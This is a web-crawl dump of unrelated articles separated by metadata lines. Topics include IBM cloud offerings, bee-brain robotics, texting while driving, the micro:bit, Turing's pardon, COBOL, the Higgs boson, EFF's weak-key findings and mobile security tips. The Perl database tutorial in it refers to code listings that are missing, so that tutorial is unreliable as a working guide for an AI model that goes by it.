Wrapping up this week's theme on Cloud Computing, I finish with an IBM announcement for two new products to help clients build private cloud environments from their existing Service Oriented Architecture (SOA) deployments.
With more than 7,000 customer implementations worldwide, IBM is the SOA market leader. Of course, both of these products above can be used with IBM System Storage solutions, including Cloud-Optimized Storage offerings like Grid Medical Archive Solution (GMAS), Grid Access Manager software, Scale-Out File Services (SoFS), and the IBM XIV disk system.
IBM is part of the "Cloud Computing 5" major vendors pushing the envelope (the other four are Google, Microsoft, Amazon and Yahoo). In fact, IBM has a number of initiatives that allow customers to leverage IBM software in a cloud. IBM is working in collaboration with Amazon Web Services (AWS), a subsidiary of Amazon.com, Inc. to make IBM software available in the Amazon Elastic Compute Cloud (Amazon EC2). WebSphere sMash, Informix Dynamic Server, DB2, and WebSphere Portal with Lotus Web Content Management Standard Edition are available today through a "pay as you go" model for both development and production instances. In addition to those products, IBM is also announcing the availability of IBM Mashup Center and Lotus Forms Turbo for development and test use in Amazon EC2, and intends to add WebSphere Application Server and WebSphere eXtreme Scale to these offerings.
For more about IBM's leadership in Cloud Computing, see the IBM [Press Release].Read More] | <urn:uuid:858ab9b4-f90f-4cd0-8edb-03321696ae21> | CC-MAIN-2017-09 | https://www.ibm.com/developerworks/community/blogs/InsideSystemStorage/date/200905?sortby=0&page=2&maxresults=5&lang=en | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170823.55/warc/CC-MAIN-20170219104610-00381-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.940178 | 2,521 | 3.140625 | 3 |
University researchers are studying the brains of honey bees in an attempt to build an autonomous flying robot.
By creating models of the systems in a bee's brain that control vision and sense of smell, scientists are hoping to build a flying robot that can do more than carry out pre-programmed instructions. Such a robot would be able to sense and act as autonomously as a bee.
Researchers at the University of Sheffield and the University of Sussex in England are teaming up to take on what they call one of the major challenges of science today -- building a robot with artificial intelligence good enough to perform complex tasks as well as an animal can.
If that's possible, the flying robot would be able to use its "sense of smell" to detect gases or other odors and then home in on the source.
"The development of an artificial brain is one of the greatest challenges in artificial intelligence," said James Marshall, lead project researcher at the University of Sheffield. "So far, researchers have typically studied brains such as those of rats, monkeys and humans. But actually simpler organisms, such as social insects, have surprisingly advanced cognitive abilities."
The universities are using GPU accelerators, donated by Nvidia, to perform the massive calculations needed to simulate a brain using a standard desktop PC, instead of a far more expensive supercomputer.
Mixing brain and robotic research isn't new.
Duke University researchers reported in 2008 that they had worked with Japanese scientists to use the neurons in a monkey's brain to control a robot. Scientists hoped the project would help them find ways to give movement back to people suffering from paralysis.
That research came on the heels of work done in 2007 at the University of Arizona, where scientists successfully connected a moth's brain to a robot. Linked to the brain of a hawk moth, the robot responded to what the moth was seeing and was able to move out of the way when an object approached the moth.
Scientists working on the moth project five years ago predicted that people will be using "hybrid" computers -- a combination of hardware and living organic tissue -- sometime between 2017 and 2022.
In the research on bees' brains, the scientists said they hope their findings can be used to build flying robots that could, for example, be used in search and rescue missions, perhaps to gather information that rescue teams could use to make decisions about how to proceed.
"Not only will this pave the way for many future advances in autonomous flying robots, but we also believe the computer modeling techniques we will be using will be widely useful to other brain modeling and computational neuroscience projects," said Thomas Nowotny, project leader at the University of Sussex.
Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin and on Google+, or subscribe to Sharon's RSS feed . Her email address is firstname.lastname@example.org. | <urn:uuid:4b2678e7-74cb-44c7-a26b-2462e7d50987> | CC-MAIN-2017-09 | http://www.computerworld.com/article/2491852/emerging-technology/researchers-study-bee-brains-to-develop-flying-robots.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00081-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.95012 | 602 | 4.09375 | 4 |
A study conducted at Texas A&M University has found that driver response times are significantly delayed when voicing messages aloud to your phone - troublesome news for the likes of Apple and its voice command system, Siri.
It is the first study to compare traditional texting with voice-to-text on a handheld device during driving.
Christine Yager, the woman who headed the study, told Reuters: "In each case, drivers took about twice as long to react as they did when they weren't texting. Eye contact to the roadway also decreased, no matter which texting method was used."
The research revolved around 43 participants, all of whom were asked to drive along a test track without using any electronic devices. They were then asked to take the same route whilst texting, and then again whilst using voice-to-text.
Yager revealed that voice-to-text actually took longer than ordinary texting, due to the need to correct errors during transcription.
Research carried out by The Cellular Telecommunications Industry Association found that 6.1 billion text messages per day were sent in the United States in 2012 alone. Data collected from AAA, the national driver's association, revealed that 35 per cent of drivers admitted to reading a text or email while driving, whilst 26 per cent admitted to typing a message.
Yager voiced concerns that drivers actually feel safer whilst using the voice-to-text method of communicating whilst driving, even though driving performance is equally hindered. The worry is that this may lead to a false belief that texting using spoken commands is safe, when this isn't the case.
Last year, a survey carried out by ingenie, a driving insurance company for 17-25 year olds, asked 1,000 customers how they use their phone whilst driving. 17 per cent admitted to playing Angry Birds behind the wheel.
This doesn't bode well for Volkswagen; the German car giant has just unveiled the iBeetle, which is based around the idea of being able to manipulate your car through voice commands issued to the iPhone.
This story, "Apple's Siri Could Make You Crash" was originally published by Macworld U.K.. | <urn:uuid:29cf0ced-a147-49f2-8c1f-f9fb3571e0c1> | CC-MAIN-2017-09 | http://www.cio.com/article/2386443/mobile-apps/apple-s-siri-could-make-you-crash.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00257-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.974941 | 438 | 2.828125 | 3 |
Digital Reasoning is a leader in cognitive computing. We build software that understands human communication - in many languages, across many domains, and at enormous scale. We help people see the world more clearly so they can make a positive difference for humanity.
People observe patterns in the world around them and use those patterns to deal with the world. It's hard to teach computers about the world.
Cognitive computing is all about helping computers learn from data to make more accurate predictions over time. It relies on repeatable statistical patterns to generalize from examples. Knowledge representation and pattern retrieval are the basis of knowledge discovery and reasoning.
Many intelligent systems are taught using simple techniques and rules to capture everything important about a specific domain. Digital Reasoning takes an entirely different approach. Our software assembles an integrated circuit of algorithms that automagically organize information into a graph-based knowledge model to enable predictions based on a high fidelity representation of context.
In simple terms: It thinks more like people do. And, like the human mind, our technology quickly learns new things, adapts and gets smarter over time.
People have the unique ability to use knowledge and experience to understand situations in time and space. A person can grasp that the term “frequent flier miles” really means “illegal payments” in the context of a specific conversation. Computers can’t think that way. They often miss what’s simmering just below the surface. Yet, people need help from technology to make sense of large volumes of ambiguous data across a wide range of sources that are written in multiple languages.
Digital Reasoning solves this problem, by amplifying human intelligence with more comprehensive situational awareness. Our technology's ability to apply knowledge to data enables it to more quickly and effectively extract knowledge from data. Like a person, our software looks at communication in different ways and interprets different meanings of signals; then it uses reasoning and thoughtful user experience to clear away the ambiguity and pinpoint the truth. As a result, our solutions help assist people's actions and enable them to make timely and informed decisions.
At Digital Reasoning, we believe intelligence should not be reproduced synthetically without a clear purpose; rather it should be created to further humanity. A virtuous cycle of human creativity and advanced technology will bring more value out of data than ever before.
Whether it’s identifying terrorist threats, uncovering insider trading in the finance industry or helping to deliver better patient care, organizations are working to solve some extremely difficult problems. By amplifying human intelligence with external digital systems based on new machine learning capabilities, people will boost their capacity to process information in time and space—synthesizing what's important to them and, ultimately, predicting consequences of their actions. | <urn:uuid:3b50b3f4-fd6a-46b7-8192-9ec49e7044c2> | CC-MAIN-2017-09 | http://www.digitalreasoning.com/visionary-approach/more-human | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00257-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.929085 | 557 | 2.84375 | 3 |
Smart phone: 30 years in the making
- By Kevin McCaney
- Jul 08, 2013
Smart phones have become such ubiquitous tools for work and personal business that it’s easy to take them for granted, even only a few years after they first appeared. And they have revolutionized how public-sector agencies do business. But they didn’t just spring from Steve Jobs’ mind — the technology behind them can be traced back to GCN’s beginnings, and further, into government research projects. Here’s a brief look at what’s behind a smart phone’s key components.
Camera: NASA developed the concept of a digital camera in the 1960s. Kodak built the first digital camera in 1975, but in the '90s NASA developed new ways of miniaturizing cameras with the CMOS active-pixel sensor.
GPS receiver: The Global Positioning System project was started in 1972, became fully operational in 1995. In 2000, its highest-grade signals were opened up for civil use.
Network: The first analog cellular system, now known as 1G, was introduced in 1978. Cell phone use took off in the 1990s with 2G networks. 3G (mobile broadband) appeared in 2001, and by 2011 was giving way to 4G (WiMax and LTE), which uses IP packet switching.
Touch screen: The first multitouch device was created at the University of Toronto in 1982. The HP 150, among the first touch-screen computers, appeared the next year. Improvements over the years came with the Apple Newton (1993), Sony’s SmartSkin (2002) and other technologies. Touch screens took a leap forward in 2007 with the first iPhone. For the surface, many phones use Gorilla Glass.
System-on-a-chip: Thanks to Moore’s Law (1965) holding true, advances in processor cores, GPUs, and other components means they can be squeezed into a small, handheld form.
DRAM: Once the province of PCs, workstations and supercomputers, dynamic random access memory has been showing up in larger doses as smart phones get more sophisticated. According to one study, in 2011, no phone had more than 800M of DRAM; today, 4G, 8G and even 16G are becoming common.
Battery: Research into lithium ion batteries dates to the 1970s, but the first prototype was built in 1985 and the first Li-ion battery hit the market in 1991. Its density has tripled since, but that trails far behind advances with other components. Today, most improvements in battery life are credited to more efficient, low-power systems.
Power amplifier/PMIC: Two things in the battery's corner: the power amplifier can extend battery life and speed up data rates, while the PMIC is an integrated circuit designed to manage power requirements.
Storage: Flash memory cards began appearing in the 1990s, and grew smaller, more capacious and cheaper over the past decade. Today, you can have a smart phone with up to 128G of storage.
Sensors: Most smart phones have gyroscopes and accelerometers, and some new models are adding barometers, thermometers and hygrometers (for humidity). NASA began working on miniaturized microsensors for weather research in 1992.
Magic act: To get an idea of just how disruptive smart phones have been, here are a few things they are helping to make disappear: Music players, radios, cameras, video cameras, planners, music and image storage, boarding passes, phone books, rolodexes, instrument tuners, maps, pay phones, calculators, books and, for some users, PCs.
Kevin McCaney is a former editor of Defense Systems and GCN. | <urn:uuid:5eb09dff-33db-4fd2-9b8d-3fee2c867082> | CC-MAIN-2017-09 | https://gcn.com/articles/2013/05/30/gcn30-smartphone-30-years-in-the-making.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00257-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.94758 | 783 | 3.0625 | 3 |
The BBC, working in collaboration with Lancaster University and Nominet, has managed to turn the micro:bit computer board into a functioning IoT device.
Launched in 2015, the micro:bit is a computer that aims to get young people interested in science, technology, engineering and maths (STEM).
It's 4cm by 5cm in size, and users are able to connect it to Arduino and Raspberry Pi devices. There's also Bluetooth technology on board for connectivity.
But now researchers have found a method for the computers to transmit data packets between each other, which Nominet believes will let children learn how the internet and IoT function.
In order for the tech to be used in schools, it has to be easy-to-use and safe, Nominet has said. Its method would see data transferred between the boards with a special handle, meaning personal data isn’t stored.
As well as this, each child will also be able to access a private friend list, where they’ll be able to find their classmates’ handles. They can then add who they want, safely.
The method works with a Raspberry Pi acting as a gateway for connectivity, and Nominet will provide disk images for each Pi so there isn’t a need for lots of complex code.
When the user is connected, they select their handle through a gateway. It’s transferrable between micro:bits, which means they can use more than one.
Nominet’s IOT tools work as the backend system for the IoT network, with its registry storing data and providing a layer between devices – helping to keep things simple.
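The BBC and Nominet have not published the classroom code, so the following MicroPython sketch is only a guess at how a pupil's micro:bit might broadcast short, handle-tagged messages for the Raspberry Pi gateway to relay; the handle, radio group and message format are invented.

```python
# Illustrative MicroPython sketch (not the BBC/Nominet code).
from microbit import button_a, display
import radio

HANDLE = "otter42"          # hypothetical handle assigned instead of any personal data
radio.on()
radio.config(group=7)       # all micro:bits in the class share one radio group

while True:
    if button_a.was_pressed():
        radio.send(HANDLE + ":hello")     # gateway would forward "otter42:hello" upstream
    incoming = radio.receive()
    if incoming:
        display.scroll(incoming)          # show messages relayed from classmates
```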
Expanding IoT expertise
Adam Leach, Nominet director of research and development, says the organisation is developing this project so that it expands its existing IoT expertise.
"We have built a strong set of tools that enable IoT applications and now we are on a mission to establish other use cases," he said. "This project with the BBC will really show what our technology can do."
“We introduced privacy by design by making sure personal data wasn’t part of the system in the first place,” said Leach. “We don’t want the name, password or email address of anybody using a micro:bit.”
Hands-on learning is vital
Simon Shen, CEO of 3D printer brand, XYZprinting, believes it’s vital that when it comes to teaching youngsters tech, they get a hands-on experience.
He told Internet of Business: “Educators have to make sure that youngsters are learning hands-on. With 3D printing, for example, kids get much more out of designing their own 3D model and seeing it being built in front of them than merely being told the mechanics.
“Tech organisations who want to get kids interested in internet technologies should make ‘play’ the centre of their design – using technology that’s fun removes a lot of barriers to learning and adoption. Take robots, for example: designing, assembling and programming a robot engages students across a range of STEAM skills while being fun – a great example of entertainment.”
Major skills shortage
Robert Dragan, CEO of Welsh edtech start-up Learnium, says there’s a major shortage of technical talent in the UK but says products like the micro:bit are doing their bit to solve this problem.
He told Internet of Business: “Let’s look at the big picture. The world is moving towards a digital and creative economy. Yet, the UK has a shortage of technical and scientific talent – the very people that will power the new economy. The future depends on promoting STEM subjects to young people.
“Children are most excited when they can apply creative thinking to the world around them. Using the micro:bit with the IoT promises just that. It’s a great opportunity that hopefully will upgrade the education system.”
You might like to read: Businesses ready to invest in Internet of Things technologies | <urn:uuid:3c567402-62a2-4f2d-ac20-63b5e3da6e9a> | CC-MAIN-2017-09 | https://internetofbusiness.com/bbcs-micro-iot-get-kids-interested-tech/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172017.60/warc/CC-MAIN-20170219104612-00129-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.94417 | 878 | 3.25 | 3 |
Article by Dan Auerbach
Researchers Use EFF's SSL Observatory To Discover Widespread Cryptographic Vulnerabilities
A research team led by cryptographer Arjen Lenstra at EPFL has discovered tens of thousands of keys that offer effectively no security due to weak random number generation algorithms.
The consequences of these vulnerabilities are extremely serious. First, a weak key would allow an eavesdropper on the network to learn confidential information, such as passwords or the content of messages, exchanged with a vulnerable server.
Secondly, unless servers were configured to use perfect forward secrecy, sophisticated attackers could extract passwords and data from stored copies of previous encrypted sessions.
Thirdly, attackers could use man-in-the-middle or server impersonation attacks to inject malicious data into encrypted sessions. Given the seriousness of these problems, EFF will be working around the clock with the EPFL group to warn the operators of servers that are affected by this vulnerability, and encourage them to switch to new keys as soon as possible.
While we have observed and warned about vulnerabilities due to insufficient randomness in the past, Lenstra's group was able to discover more subtle RNG bugs by searching not only for keys that were unexpectedly shared by multiple certificates, but for prime factors that were unexpectedly shared by multiple publicly visible public keys. This application of the 2,400-year-old Euclidean algorithm turned out to produce spectacular results.
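The idea is easy to demonstrate in miniature: if two RSA moduli share a prime factor because the random number generator that produced them was weak, a single GCD computation exposes that prime and both keys factor instantly. The numbers below are toy values chosen for illustration; the actual study ran this over millions of observed public keys.

```python
# Toy demonstration of finding a shared prime factor between two RSA moduli.
from math import gcd

p, q1, q2 = 61, 53, 59          # tiny "primes" for illustration only
n1, n2 = p * q1, p * q2         # two moduli that accidentally share the factor p

shared = gcd(n1, n2)            # Euclid's algorithm, roughly 2,400 years old
if shared > 1:
    print("shared prime:", shared)
    print("n1 factors as", shared, "*", n1 // shared)
    print("n2 factors as", shared, "*", n2 // shared)
```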
In addition to TLS, the transport layer security mechanism underlying HTTPS, other types of public keys were investigated that did not use EFF's Observatory data set, most notably PGP.
The cryptosystems that underlay the full set of public keys in the study included RSA (which is the most common class of cryptosystem behind TLS), ElGamal (which is the most common class of cryptosystem behind PGP), and several others in smaller quantities.
Within each cryptosystem, various key strengths were also observed and investigated, for instance RSA 2048 bit as well as RSA 1024 bit keys. Beyond shared prime factors, there were other problems discovered with the keys, which all appear to stem from insufficient randomness in generating the keys.
The most prominently affected keys were RSA 1024 bit moduli. This class of keys was deemed by the researchers to be only 99.8% secure, meaning that 2 out of every 1000 of these RSA public keys are insecure. Our first priority is handling this large set of tens of thousands of keys, though the problem is not limited to this set, or even to just HTTPS implementations.
We are very alarmed by this development. In addition to notifying website operators, Certificate Authorities, and browser vendors, we also hope that the full set of RNG bugs that are causing these problems can be quickly found and patched. Ensuring a secure and robust public key infrastructure is vital to the security and privacy of individuals and organizations everywhere.
Cross-posted from Electronic Frontier Foundation | <urn:uuid:e81c5452-5952-473d-9e03-a298fd924730> | CC-MAIN-2017-09 | http://www.infosecisland.com/blogview/20260-Researchers-Discover-Widespread-Cryptographic-Vulnerabilities.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171078.90/warc/CC-MAIN-20170219104611-00601-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.961823 | 582 | 2.78125 | 3 |
Grandfather of computing Alan Turing granted posthumous royal pardon
Dr Alan Turing, the mathematician who helped to crack the Enigma code during the second world war, has been granted a royal pardon 59 years after he took his own life. His crime? Homosexuality. In spite of his role in code cracking -- which is widely regarded as having helped to shorten the war -- he was convicted for engaging in homosexual activity, and underwent experimental chemical castration as "cure" and punishment in 1952. Two years later he killed himself aged just 41.
It was the illegality of homosexuality that meant Turing's relationship with a man led to a criminal record, and this in turn meant that he was no longer permitted to continue his work at GCHQ (Government Communications Headquarters). The UK's justice secretary, Chris Grayling requested the pardon which was then granted under the Royal Prerogative of Mercy. Grayling said:
"Dr Alan Turing was an exceptional man with a brilliant mind. His brilliance was put into practice at Bletchley Park during the second world war, where he was pivotal to breaking the Enigma code, helping to end the war and save thousands of lives. His later life was overshadowed by his conviction for homosexual activity, a sentence we would now consider unjust and discriminatory and which has now been repealed."
The pardon has not come completely out of the blue, as there has been a long-running campaign to clear Turing's name. In 2009, former UK Prime Minister Gordon Brown apologized for the "appalling treatment" Turing had received, and calls have been made for a pardon for some years. The campaign received the backing of names such as Professor Stephen Hawking and Richard Dawkins. Pardons are usually only granted when it later transpires that someone convicted of a crime is in fact innocent. As Turing engaged in homosexual activity (or "gross indecency" as it was termed), he was, technically speaking, guilty.
While the pardon has been welcomed by many, for others it is not enough. Turing is just one of many people convicted under a law that does not exist anymore. His high-profile work led to a high-profile campaign to clear his name, but it does nothing for the less well-known people convicted of the same "crime". We can thank Turing not only for the work he did during the war, but also for paving the way for modern computing. This is not really the place for debate about the rights and wrongs of a 61-year-old conviction, but Richard Dawkins makes a good point on Twitter: "Overturn a conviction" sounds a lot better than "pardon". "Pardon" implies that #Turing did something wrong in the first place.
Anyway -- thanks Mr Turing. | <urn:uuid:945e63d6-305f-4546-aac2-b730ba67d928> | CC-MAIN-2017-09 | https://betanews.com/2013/12/24/grandfather-of-computing-alan-turing-granted-posthumous-royal-pardon/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173866.98/warc/CC-MAIN-20170219104613-00001-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.984998 | 554 | 2.546875 | 3 |
Enterprise Applications: 20 Things You Might Not Know About COBOL (as the Language Turns 50)
The name COBOL was selected during a meeting of the Short Range Committee, the organization responsible for submitting the first version of the language, on Sept. 18, 1959. This committee, formed by a joint effort of industry, major universities and the U.S. government, was known as CODASYL (Conference on Data Systems Languages). CODASYL completed the specifications for COBOL as 1959 ended. These were approved by the Executive Committee in January 1960 and sent to the government printing office, which edited and printed these specifications as Cobol 60. COBOL was developed within a six-month period, and yet is still in use more than 50 years later. | <urn:uuid:6ec3c84b-9092-41bc-9939-5c180aae0801> | CC-MAIN-2017-09 | http://www.eweek.com/c/a/Enterprise-Applications/20-Things-You-Might-Not-Know-About-COBOL-As-the-Language-Turns-50-103943 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171163.39/warc/CC-MAIN-20170219104611-00297-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.975294 | 161 | 2.921875 | 3 |
Scientists working to find the elusive "God particle" say they've discovered "intriguing" signs that it does exist and they are closing in on what could be a basic building block of the universe.
Researchers working at the Large Hadron Collider, the world's largest particle collider located astride the Swiss/French border, were quick to note they have not yet found anything to definitively prove or disprove that the Higgs boson particle exists. However, they think they're close enough to figure it out within a year.
The Higgs boson particle has long been a focus of great scientific speculation. If it does exist, it's thought to account for why everything in the universe has mass. Frequently referred to as the "God particle," it could be a key component of everything from humans to stars and planets, as well as the vast majority of the universe that is invisible.
Scientists hope that finding Higgs boson could help answer many of the great mysteries of the universe. Conversely, without this cornerstone of physics, many of the theories that serve as the underpinnings of human understanding of the universe evaporate.
"We cannot conclude anything at this stage," said Guido Tonelli, an Italian physicist who has been studying the Higgs boson. "We need more study and more data. Given the outstanding performance of the [Large Hadron Collider] this year, we will not need to wait long for enough data and can look forward to resolving this puzzle in 2012."
Part of the difficulty in finding the particle, if it does exist, is that physicists don't have any idea of what mass Higgs boson itself might have. That means they have to look for it through an expansive range of mass possibilities.
Researchers working at the Large Hadron Collider noted in an announcement Tuesday that they now think Higgs boson is more likely to be found in the lower range of the mass spectrum.
"Tantalizing hints have been seen... in this mass region, but these are not yet strong enough to claim a discovery," wrote a spokesman for the European Organization for Nuclear Research (CERN), which runs the Large Hadron Collider.
Scientists working at the Large Hadron Collider, which went online in September of 2008, are on a quest to answer some of the great mysteries of the universe: the existence of Higgs boson, understanding dark matter and black holes, and finding new dimensions.
Smashing the beams together inside the 17-mile underground collider creates showers of new particles that should replicate conditions in the universe just moments after its conception.
Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed. Her e-mail address is firstname.lastname@example.org.
This story, "Scientists closing in on 'God particle' existence" was originally published by Computerworld. | <urn:uuid:978f62cb-220c-4cb9-9d56-5bd64cbf5fe5> | CC-MAIN-2017-09 | http://www.itworld.com/article/2733135/consumer-tech-science/scientists-closing-in-on--god-particle--existence.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171163.39/warc/CC-MAIN-20170219104611-00297-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.961439 | 615 | 2.765625 | 3 |
Homebrew NMS: Keep a Database of Network Assets
Our previous installment explained how to glean data from SNMP-capable devices using Perl's Net::SNMP module. Now it's time to do something useful: store this data in a database.
Over time, we find it necessary to gather more and more information. An NMS solution may be able to store data in its internal database, but sometimes we need to combine many data sources in a single place. For example, it's extremely useful to grab Layer 2 discovery data and place it into a "host database," which will contain much more information than your discovery application provides. A few top-of-the-head examples are: owner information, serial number, related ticket numbers from your trouble ticketing system, physical location, and much, much more.
We'll get into the details of one proposed database layout in a future article, which will provide more concrete examples of using externally gathered data to enable successful executions of IT processes.
Let's take a look at how data can be manipulated in a database. Using Perl's DBD::Pg module, we can access a PostgreSQL database easily. MySQL will work fine too; this is just an example. There are many aspects to DBD::Pg that aren't covered here, so be sure to read the documentation for further details.
The overall concept of DBD::Pg is best expressed in steps:
- Define database name, host name of the database server, and your username and password
- Connect to the database
- Execute queries: insert new data, retrieve existing data, or delete data
So let's see this in action. The following example connects to a PostgreSQL database and executes a simple "SELECT" query. Here's the connection part:
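(The code listing that originally appeared here did not survive in this copy of the article, so the following is a minimal reconstruction sketch rather than the author's exact code. The database name, host, and credentials are placeholders.)

```perl
#!/usr/bin/perl
use strict;
use warnings;
use DBI;   # the "dbi:Pg" data source name below pulls in DBD::Pg automatically

# Placeholder connection details -- substitute values for your environment
my $dbname = "hostdb";
my $dbhost = "db.example.com";
my $dbuser = "nmsuser";
my $dbpass = "secret";

# Build the data source name and connect to PostgreSQL
my $dbh = DBI->connect("dbi:Pg:dbname=$dbname;host=$dbhost",
                       $dbuser, $dbpass,
                       { AutoCommit => 1, PrintError => 1 });

die "Unable to connect: $DBI::errstr\n" unless defined $dbh;
```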
The above code sets some useful variables, and then crafts the arguments required by the connect() method. The $dbh variable is a database handle returned by DBI, and if it is undefined after the connect() call, that means the connection did not succeed.
At this point we simply need to use the handle returned by DBI->connect() to execute queries. First, a database statement must be "prepared." If, for example, you needed to execute the same query over and over, you would execute() the query in a loop, but with different variables each time. As a performance enhancement, prepare() with a question-mark placeholder allows you to avoid sending the entire query text over and over; only the new arguments are sent for each subsequent execute() call. We aren't using substitution in the following example, but you need to be aware of the real purpose of prepare().
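(Again, the original listing is missing here; this sketch shows one plausible form of the query. The table name "hosts" is an assumption, since the article names only its columns.)

```perl
# A simple SELECT, deliberately written without placeholder substitution
my $query = "SELECT switch, switchport, mac_addr, lastseen "
          . "FROM hosts WHERE mac_addr = '00:11:22:33:44:55'";

my $sth = $dbh->prepare($query) or die "prepare failed: $DBI::errstr\n";
$sth->execute                   or die "execute failed: $DBI::errstr\n";

my @row = $sth->fetchrow_array;   # we expect a single matching row
print "switch=$row[0], port=$row[1], last seen $row[3]\n" if @row;
```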
The above code executes the SELECT query as commanded and prints the results. It is quite straightforward after reading the DBD::Pg documents, but there are a few things to point out. The $DBI::errstr variable is always available, and should be printed if any call to a DBD function fails; this means that you need to check the return value of every function call. The fetchrow_array method returns an array containing the data returned from the database. It may be wise to check that only one result was returned!
Since @row is an array, it can be accessed by referencing individual indexes, like so: $row[0]. You will know the database schema beforehand, so accessing individual fields inside @row should be easy. If you're going to be using the data frequently during processing, it is recommended that you assign each field in the array a useful variable name.
For the sake of the example, we'll assume that we have new knowledge about a host in our database. The mythical database keeps track of switch, switchport, mac_addr, and "lastseen" (in that order). An easy way to update this information, correcting the switchport information, follows.
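(The original listing is not preserved; the sketch below assumes the same "hosts" table as above, and the corrected port value is invented for illustration.)

```perl
# Give the fields of @row meaningful names (order: switch, switchport, mac_addr, lastseen)
my ($switch, $switchport, $mac_addr, $lastseen) = @row;

# Correct the switchport and refresh the lastseen timestamp, this time using placeholders
my $update = $dbh->prepare(
    "UPDATE hosts SET switchport = ?, lastseen = now() WHERE mac_addr = ?"
) or die "prepare failed: $DBI::errstr\n";

$update->execute('Gi0/14', $mac_addr) or die "execute failed: $DBI::errstr\n";
```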
When processing data returned from the DB gets more complex, assigning the @row elements meaningful names saves a lot of time and frustration. See how strange it gets referring to $row[number]? Referring back to the order of database elements gets quite tedious.
Inserting new data into the database is actually easier; just create some INSERT queries based on whatever data you have available. The difficult part is keeping track of what data types and fields you need to insert into a database row. I find it best to include the output of '\d' in PostgreSQL right in a comment in my source code, and also to name variables based on database fields.
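(A sketch of such an INSERT follows; the column types recorded in the comment are assumptions, kept inline as the article suggests.)

```perl
# Output of "\d hosts" kept as a reference comment (types assumed for this sketch):
#   switch     | text
#   switchport | text
#   mac_addr   | macaddr
#   lastseen   | timestamp
my ($new_switch, $new_port, $new_mac) = ('sw-closet-2', 'Gi0/3', '00:aa:bb:cc:dd:ee');

my $insert = $dbh->prepare(
    "INSERT INTO hosts (switch, switchport, mac_addr, lastseen) VALUES (?, ?, ?, now())"
) or die "prepare failed: $DBI::errstr\n";

$insert->execute($new_switch, $new_port, $new_mac) or die "execute failed: $DBI::errstr\n";
```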
We'll be using the above example to show how easy it is to store, and more importantly, correlate data from multiple sources in a single authoritative database. Before zooming out to the overall IT picture, we'll continue focusing on network-based information in the next article: managing and verifying discovery data. | <urn:uuid:a75e802b-5109-4864-aaa3-d8722b7aa580> | CC-MAIN-2017-09 | http://www.enterprisenetworkingplanet.com/print/netos/article.php/3699296/Homebrew-NMS-Keep-a-Database-of-Network-Assets.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171608.86/warc/CC-MAIN-20170219104611-00473-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.895478 | 997 | 2.890625 | 3 |
- Passwords – Just as someone would use a password to access his/her computer, so too should someone install a password protection system on his/her mobile device. Passwords allow the phone to lock when not in use, preventing sensitive data from being easily compromised.
- System Updates – These are recommended by the manufacturer for a reason – these valuable updates contain patches for vulnerability issues and help further secure data. Always keep devices updated for maximum-security protection.
- Mobile Monitoring Applications – A reliable system helps safeguard data, tracks a stolen or missing phone and fights off mobile threats.
- Links and Files – Always exercise the utmost caution when opening any link or file on a Smartphone. As with any electronic device, never open an attachment from an unfamiliar sender and it is recommended that the user type in the website directly instead of simply following a link, which could result in a phishing attack.
- Exercise Caution on Public Networks – It is advisable to avoid banking and other password-protected private transactions when on a public Wi-Fi network.
- Install Applications from Trusted Sources – Downloading applications from reputable stores is advisable, especially when compared to an unknown third party.
- Confirm Applications’ Access – For example, some games have direct access to personal data applications. There is no need for this type of information sharing, so regular inspection of data sharing is important for helping minimize security breaches and/or threats.
- Secure VPN – A secure system encrypts data, making it more difficult for thieves to randomly steal information.
As Smartphones are becoming the very epicenter of human lives, they contain an abundance of information, including bank accounts, text messages, contacts, passwords and credit cards. These devices are readily connected constantly, making them more vulnerable to attacks and scams. As many businesses offer Smartphones to their employees, especially those in positions where they are constantly traveling and meeting potential clients, being readily on the move means Smartphone data can be accessed by unwanted, prying eyes. While no method is completely foolproof, as cyber attacks are constantly evolving, there are some measures employees can take to help reduce the likelihood of becoming a victim. | <urn:uuid:58c4f2ab-6930-43c5-abad-2dded5915329> | CC-MAIN-2017-09 | https://jive.com/blog/tips-securing-mobile-data/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174135.70/warc/CC-MAIN-20170219104614-00045-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.927991 | 439 | 2.6875 | 3 |
Block Data Compression
Who chooses block data compression, and why
Anyone with a block-based storage solution can benefit from block data compression. Since compression is managed as a volume attribute, it's easy to enable, configure, and monitor regardless of user expertise.
How block data compression works
Block data compression reduces the size of data on disk, enabling more efficient storage capacity utilization on EMC CLARiiON and EMC Celerra systems. Compression occurs in the background to minimize performance overhead.
Benefits of block data compression
